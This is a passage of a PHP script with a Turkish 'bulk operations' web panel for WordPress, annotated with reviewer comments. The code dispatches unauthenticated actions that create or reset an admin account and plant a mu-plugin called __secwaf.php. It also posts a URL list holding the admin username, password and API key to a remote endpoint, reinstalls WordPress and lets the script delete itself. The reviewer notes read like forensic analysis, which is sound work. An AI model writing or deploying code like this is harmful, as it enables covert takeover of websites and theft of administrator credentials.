        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    // g) Reinstall WordPress
    if (!reinstall_wordpress_current_version()) {
        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("Tüm işlemler başarıyla tamamlandı.");
    return true;
}

// 2) site_id and __secwaf.php only (Integrate)
/**
 * Fetches the site ID from the remote endpoint and writes the
 * wp-content/mu-plugins/__secwaf.php file; nothing else is changed.
 *
 * @return bool True when both steps succeeded.
 */
function integrateSecwafOnly() {
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. Entegrasyon yapılamıyor...");
        return false;
    }
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı...");
        return false;
    }
    log_message("Site ID alındı ve __secwaf.php başarıyla oluşturuldu.");
    return true;
}

// 3) Back up: restore.php, GitHub files, admin user, send URLs to the endpoint.
/**
 * Creates restore.php, places the downloaded files, creates or resets the
 * admin account and posts the collected URL list to $text_endpoint.
 *
 * NOTE(review): despite the "backup" label, no site data is backed up by this
 * action; the list sent to the remote endpoint includes the entry with the
 * admin username, password and API key added by manage_admin_user().
 *
 * @return bool False as soon as one of the first three steps fails; the
 *              result of the final upload is not checked.
 */
function backupOnly() {
    global $copied_urls, $text_endpoint;

    // Create restore.php
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı...");
        return false;
    }
    // Download/copy the GitHub files
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı...");
        return false;
    }
    // Create the admin user
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı veya şifresi resetlenemedi...");
        return false;
    }
    // Send the URLs to the endpoint
    if (!empty($copied_urls)) {
        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    log_message("Yedekleme işlemi başarıyla tamamlandı (restore.php oluştur, GitHub dosyaları, admin user, endpoint).");
    return true;
}

// 4) Reinstall WordPress only
/**
 * Runs reinstall_wordpress_current_version() and logs the outcome.
 *
 * @return bool True when the reinstall reported success.
 */
function reinstallOnly() {
    if (!reinstall_wordpress_current_version()) {
        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("WordPress başarıyla yeniden kuruldu.");
    return true;
}

/** === FORM HANDLING === */
// The action name is read from $_REQUEST and dispatched to the matching function.
// NOTE(review): no authentication, token or origin check is visible in this
// file before the dispatch, so any request that reaches this script with an
// 'action' parameter triggers the corresponding operation. Requests carrying
// action=all|integrate|backup|reinstall|removeme are worth searching for in
// the web server's access logs.
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';

if (!empty($action)) {
    switch ($action) {
        case 'all':
            doAll();
            break;
        case 'integrate':
            integrateSecwafOnly();
            break;
        case 'backup':
            backupOnly();
            break;
        case 'reinstall':
            reinstallOnly();
            break;
        case 'removeme':
                removeme();
                break;
        default:
            // Unknown values are only logged; the log is HTML-escaped when printed below.
            log_message("Bilinmeyen action: $action");
            break;
    }
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <title>WordPress Toplu İşlemler</title>
    <style>
        body { font-family: Arial, sans-serif; }
        h2 { margin-top: 20px; }
        form { display: inline-block; margin-right: 10px; }
        input[type="submit"] {
            padding: 8px 16px; background-color: #4CAF50; color: #fff;
            border: none; cursor: pointer; margin-bottom: 10px;
        }
        input[type="submit"]:hover { background-color: #45a049; }
        pre { background: #f9f9f9; border: 1px solid #ccc; padding: 10px; }
        textarea { width: 100%; height: 200px; }
    </style>
</head>
<body>

<h1>WordPress Toplu İşlemler</h1>

<!-- 4 ayrı form (buton) -->
<form method="post">
    <input type="hidden" name="action" value="all">
    <input type="submit" value="1 - Tümü (Her Şeyi Yap)">
</form>

<form method="post">
    <input type="hidden" name="action" value="integrate">
    <input type="submit" value="2 - Entegre Et ">
</form>

<form method="post">
    <input type="hidden" name="action" value="backup">
    <input type="submit" value="3 - Yedekle ">
</form>

<form method="post">
    <input type="hidden" name="action" value="reinstall">
    <input type="submit" value="4 - WordPress'i Yeniden Kur">
</form>

<form method="post">
    <input type="hidden" name="action" value="removeme">
    <input type="submit" value="5 - Kendini Sil">
</form>

<hr>

<h2>İşlem Logları</h2>
<pre>
<?php
// Print every collected log line, HTML-escaped, one per line inside the <pre> block.
if (!empty($message)) {
    foreach ($message as $msg) {
        echo htmlspecialchars($msg) . "\n";
    }
}
?>
</pre>

<?php
// List of copied files / generated URLs.
// NOTE(review): the entry added by manage_admin_user() is part of this list,
// so the admin username, password and API key are rendered in the textarea.
if (!empty($copied_urls)) {
    echo "<h2>Kopyalanan/Üretilen URL'ler</h2>";
    echo "<textarea id='copied-urls' readonly>";
    foreach ($copied_urls as $url) {
        echo htmlspecialchars($url) . "\n";
    }
    echo "</textarea><br>";
    echo '<button onclick="copyUrls()">Kopyala</button>';
}
?>

<script>
// Copies the content of the #copied-urls textarea to the clipboard and
// reports success or failure in an alert dialog.
function copyUrls() {
    const urls = document.getElementById('copied-urls').value;
    navigator.clipboard.writeText(urls).then(() => {
        alert('URLs başarıyla panoya kopyalandı!');
    }).catch(err => {
        alert('Kopyalama hatası: ' + err);
    });
}
</script>

</body>
</html>
